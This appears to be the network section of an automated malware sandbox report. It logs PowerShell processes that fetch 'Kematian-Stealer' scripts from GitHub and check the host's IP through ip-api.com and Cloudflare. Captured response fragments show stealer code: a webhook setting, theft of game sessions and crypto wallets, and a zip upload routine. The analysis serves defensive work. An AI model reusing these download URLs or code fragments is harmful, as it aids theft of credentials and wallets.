Jul 5, 2024 06:27:00.409786940 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.409890890 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.409933090 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.409951925 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.409956932 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.409965992 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.409965992 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.460995913 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.489557028 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.489578962 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.489769936 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.489803076 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.489820004 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.489845991 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.489892006 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.489943027 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.489958048 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.490024090 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.490029097 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.490165949 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.490190029 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.490226030 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.490231991 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.490257978 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.490696907 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.490711927 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.490757942 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.490766048 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.490792990 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.490861893 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.490880966 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.490940094 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.490940094 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.490945101 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.501940966 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.501955032 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.502017975 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.502024889 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.502183914 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.502336979 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.502355099 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.502398014 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.502402067 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.502432108 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.554718018 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.582660913 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.582679987 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.582904100 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.582912922 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.582932949 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.582967997 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.583012104 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.583199978 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.583215952 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.583272934 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.583277941 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.583930969 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.583951950 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.583990097 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.583996058 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.584022999 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.584316969 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.584331036 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.584383011 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.584388971 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.584415913 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.584465027 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.584492922 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.584522963 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.584527969 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.584559917 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.594937086 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.594955921 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.595041990 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.595050097 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.595251083 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.595269918 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.595428944 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.595428944 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.595436096 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.648439884 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.675523043 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.675544024 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.675678015 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.675688028 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.675730944 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.675749063 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.675868034 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.675868034 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.675868034 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.675873995 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.675942898 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.676178932 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.676198959 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.676256895 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.676265001 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.676287889 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.676316977 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.676598072 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.676619053 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.676695108 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.676695108 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.676701069 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.676754951 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.677068949 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.677083015 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.677144051 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.677148104 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.677197933 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.677470922 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.677485943 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.677542925 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.677544117 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.677558899 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.677575111 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.677597046 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.677643061 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.677647114 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:27:00.677789927 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:00.678033113 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:27:20.098114967 CEST | 80 | 63771 | 208.95.112.1 | 192.168.2.4
Jul 5, 2024 06:27:20.098201036 CEST | 63771 | 80 | 192.168.2.4 | 208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 5, 2024 06:26:06.514014959 CEST | 49602 | 53 | 192.168.2.4 | 1.1.1.1
Jul 5, 2024 06:26:06.520781994 CEST | 53 | 49602 | 1.1.1.1 | 192.168.2.4
Jul 5, 2024 06:26:29.608944893 CEST | 64199 | 53 | 192.168.2.4 | 1.1.1.1
Jul 5, 2024 06:26:29.616512060 CEST | 53 | 64199 | 1.1.1.1 | 192.168.2.4
Jul 5, 2024 06:26:29.780062914 CEST | 53 | 57339 | 162.159.36.2 | 192.168.2.4
Jul 5, 2024 06:26:30.253716946 CEST | 52082 | 53 | 192.168.2.4 | 1.1.1.1
Jul 5, 2024 06:26:30.261429071 CEST | 53 | 52082 | 1.1.1.1 | 192.168.2.4
Jul 5, 2024 06:26:30.937925100 CEST | 51948 | 53 | 192.168.2.4 | 1.1.1.1
Jul 5, 2024 06:26:30.945338964 CEST | 53 | 51948 | 1.1.1.1 | 192.168.2.4
Jul 5, 2024 06:26:37.838207006 CEST | 56251 | 53 | 192.168.2.4 | 1.1.1.1
Jul 5, 2024 06:26:37.845974922 CEST | 53 | 56251 | 1.1.1.1 | 192.168.2.4
Jul 5, 2024 06:26:38.954514980 CEST | 53009 | 53 | 192.168.2.4 | 1.1.1.1
Jul 5, 2024 06:26:38.961018085 CEST | 53 | 53009 | 1.1.1.1 | 192.168.2.4
Jul 5, 2024 06:26:57.050343990 CEST | 57965 | 53 | 192.168.2.4 | 1.1.1.1
Jul 5, 2024 06:26:57.056972027 CEST | 53 | 57965 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 5, 2024 06:26:06.514014959 CEST | 192.168.2.4 | 1.1.1.1 | 0xe6d4 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:29.608944893 CEST | 192.168.2.4 | 1.1.1.1 | 0xb90f | Standard query (0) | www.cloudflare.com | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:30.253716946 CEST | 192.168.2.4 | 1.1.1.1 | 0x357d | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jul 5, 2024 06:26:30.937925100 CEST | 192.168.2.4 | 1.1.1.1 | 0x1330 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:37.838207006 CEST | 192.168.2.4 | 1.1.1.1 | 0xb741 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:38.954514980 CEST | 192.168.2.4 | 1.1.1.1 | 0x92bd | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:57.050343990 CEST | 192.168.2.4 | 1.1.1.1 | 0x2ae1 | Standard query (0) | objects.githubusercontent.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 5, 2024 06:26:06.520781994 CEST | 1.1.1.1 | 192.168.2.4 | 0xe6d4 | No error (0) | raw.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:06.520781994 CEST | 1.1.1.1 | 192.168.2.4 | 0xe6d4 | No error (0) | raw.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:06.520781994 CEST | 1.1.1.1 | 192.168.2.4 | 0xe6d4 | No error (0) | raw.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:06.520781994 CEST | 1.1.1.1 | 192.168.2.4 | 0xe6d4 | No error (0) | raw.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:29.616512060 CEST | 1.1.1.1 | 192.168.2.4 | 0xb90f | No error (0) | www.cloudflare.com |  | 104.16.123.96 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:29.616512060 CEST | 1.1.1.1 | 192.168.2.4 | 0xb90f | No error (0) | www.cloudflare.com |  | 104.16.124.96 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:30.261429071 CEST | 1.1.1.1 | 192.168.2.4 | 0x357d | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jul 5, 2024 06:26:30.945338964 CEST | 1.1.1.1 | 192.168.2.4 | 0x1330 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:37.845974922 CEST | 1.1.1.1 | 192.168.2.4 | 0xb741 | No error (0) | github.com |  | 140.82.121.3 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:38.961018085 CEST | 1.1.1.1 | 192.168.2.4 | 0x92bd | No error (0) | raw.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:38.961018085 CEST | 1.1.1.1 | 192.168.2.4 | 0x92bd | No error (0) | raw.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:38.961018085 CEST | 1.1.1.1 | 192.168.2.4 | 0x92bd | No error (0) | raw.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:38.961018085 CEST | 1.1.1.1 | 192.168.2.4 | 0x92bd | No error (0) | raw.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:57.056972027 CEST | 1.1.1.1 | 192.168.2.4 | 0x2ae1 | No error (0) | objects.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:57.056972027 CEST | 1.1.1.1 | 192.168.2.4 | 0x2ae1 | No error (0) | objects.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:57.056972027 CEST | 1.1.1.1 | 192.168.2.4 | 0x2ae1 | No error (0) | objects.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Jul 5, 2024 06:26:57.056972027 CEST | 1.1.1.1 | 192.168.2.4 | 0x2ae1 | No error (0) | objects.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001) | false
                                        • raw.githubusercontent.com
                                        • www.cloudflare.com
                                        • github.com
                                        • objects.githubusercontent.com
                                        • ip-api.com
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.4 | 63771 | 208.95.112.1 | 80 | 7296 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jul 5, 2024 06:26:30.950978994 CEST | 175 | OUT | GET /line/?fields=hosting HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Jul 5, 2024 06:26:31.419663906 CEST | 175 | IN | HTTP/1.1 200 OK
                                        Date: Fri, 05 Jul 2024 04:26:31 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 6
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 60
                                        X-Rl: 44
                                        Data Raw: 66 61 6c 73 65 0a
                                        Data Ascii: false
                                        Jul 5, 2024 06:26:31.422158003 CEST | 135 | OUT | GET /json HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: ip-api.com
                                        Jul 5, 2024 06:26:31.525300026 CEST | 482 | IN | HTTP/1.1 200 OK
                                        Date: Fri, 05 Jul 2024 04:26:31 GMT
                                        Content-Type: application/json; charset=utf-8
                                        Content-Length: 305
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 59
                                        X-Rl: 43
                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.4 | 49730 | 185.199.110.133 | 443 | 7536 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-07-05 04:26:07 UTC | 230 | OUT | GET /ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:07 UTC | 893 | IN | HTTP/1.1 200 OK
                                        Connection: close
                                        Content-Length: 75911
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "c0278b7cb7b50b58213bb8cf7baf3a7f2144a36b998d21c5d245aa61879a1fb0"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: EA27:EE41A:5ADD6C:638BFC:668775DC
                                        Accept-Ranges: bytes
                                        Date: Fri, 05 Jul 2024 04:26:07 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-ewr18154-EWR
                                        X-Cache: MISS
                                        X-Cache-Hits: 0
                                        X-Timer: S1720153567.105837,VS0,VE47
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: c3a47e8446114e5eb670ff869da31e4655abb150
                                        Expires: Fri, 05 Jul 2024 04:31:07 GMT
                                        Source-Age: 0
                                        2024-07-05 04:26:07 UTC | 16384 | IN | Data Ascii: #$webhook = "YOUR_URL_HERE_SERVER" #$debug = $false#$blockhostsfile = $false#$criticalprocess = $false#$melt = $false#$fakeerror = $false#$persistence = $false#$write_disk_only = $false#$vm_protect = $false#$encryption_key = "YOUR_ENC_KE
                                        2024-07-05 04:26:07 UTC | 16384 | IN | Data Ascii: rosoft\Windows\CurrentVersion\Uninstall\*" | Where-Object { $_.DisplayName -ne $null -and $_.DisplayVersion -ne $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Wrap -AutoSize | Out-String
                                        2024-07-05 04:26:07 UTC | 16384 | IN | Data Ascii: s_session -Recurse -force Copy-Item -Path "$epicgamesfolder\Saved\Data" -Destination $epicgames_session -Recurse -force } epicgames_stealer # Ubisoft function ubisoftstealer { $ubisoftfolder = "$env:localappdata\Ub
                                        2024-07-05 04:26:07 UTC | 16384 | IN | Data Ascii: "Bitcoin" = Join-Path $env:appdata "\Bitcoin\wallets" "Bytecoin" = Join-Path $env:appdata "\bytecoin\*.wallet" "Coinomi" = Join-Path $env:localappdata "Coinomi\Coinomi\wallets"
                                        2024-07-05 04:26:07 UTC | 10375 | IN | Data Ascii: rtContent = [Net.Http.MultipartFormDataContent]::new() $fileStream = [IO.File]::OpenRead($zipFilePath) $fileContent = [Net.Http.StreamContent]::new($fileStream) $fileContent.Headers.ContentType = [Net.Htt


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.4 | 49737 | 104.16.123.96 | 443 | 7296 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-07-05 04:26:30 UTC | 176 | OUT | GET /cdn-cgi/trace HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: www.cloudflare.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:30 UTC | 332 | IN | HTTP/1.1 200 OK
                                        Date: Fri, 05 Jul 2024 04:26:30 GMT
                                        Content-Type: text/plain
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Server: cloudflare
                                        CF-RAY: 89e498e2da815e72-EWR
                                        X-Frame-Options: DENY
                                        X-Content-Type-Options: nosniff
                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                        Cache-Control: no-cache
                                        2024-07-05 04:26:30 UTC | 285 | IN | Data Ascii: 116fl=649f237h=www.cloudflare.comip=8.46.123.33ts=1720153590.213visit_scheme=httpsuag=Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682colo=EWRsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgat
                                        2024-07-05 04:26:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.4 | 63770 | 104.16.123.96 | 443 | 7296 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-07-05 04:26:30 UTC | 152 | OUT | GET /cdn-cgi/trace HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: www.cloudflare.com
                                        2024-07-05 04:26:30 UTC | 332 | IN | HTTP/1.1 200 OK
                                        Date: Fri, 05 Jul 2024 04:26:30 GMT
                                        Content-Type: text/plain
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Server: cloudflare
                                        CF-RAY: 89e498e6fbb8432c-EWR
                                        X-Frame-Options: DENY
                                        X-Content-Type-Options: nosniff
                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                        Cache-Control: no-cache
                                        2024-07-05 04:26:30 UTC | 284 | IN | Data Ascii: 115fl=649f42h=www.cloudflare.comip=8.46.123.33ts=1720153590.876visit_scheme=httpsuag=Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682colo=EWRsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgate
                                        2024-07-05 04:26:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.4 | 63775 | 140.82.121.3 | 443 | 7624 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-07-05 04:26:38 UTC | 121 | OUT | GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1 HTTP/1.1
                                        Host: github.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:38 UTC | 572 | IN | HTTP/1.1 302 Found
                                        Server: GitHub.com
                                        Date: Fri, 05 Jul 2024 04:26:38 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                        Access-Control-Allow-Origin:
                                        Location: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1
                                        Cache-Control: no-cache
                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                        X-Frame-Options: deny
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 0
                                        Referrer-Policy: no-referrer-when-downgrade
                                        2024-07-05 04:26:38 UTC | 3031 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        4 | 192.168.2.4 | 63776 | 185.199.110.133 | 443 | 7624 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-07-05 04:26:39 UTC | 132 | OUT | GET /Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 HTTP/1.1
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:39 UTC | 899 | IN | HTTP/1.1 200 OK
                                        Connection: close
                                        Content-Length: 6453
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "b50d2c1034106e88552448ec70d0c1c0b89ade259fb54cca4421fb16c45cbe01"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: 706D:2F21E:1D98C2:2153BB:668775FC
                                        Accept-Ranges: bytes
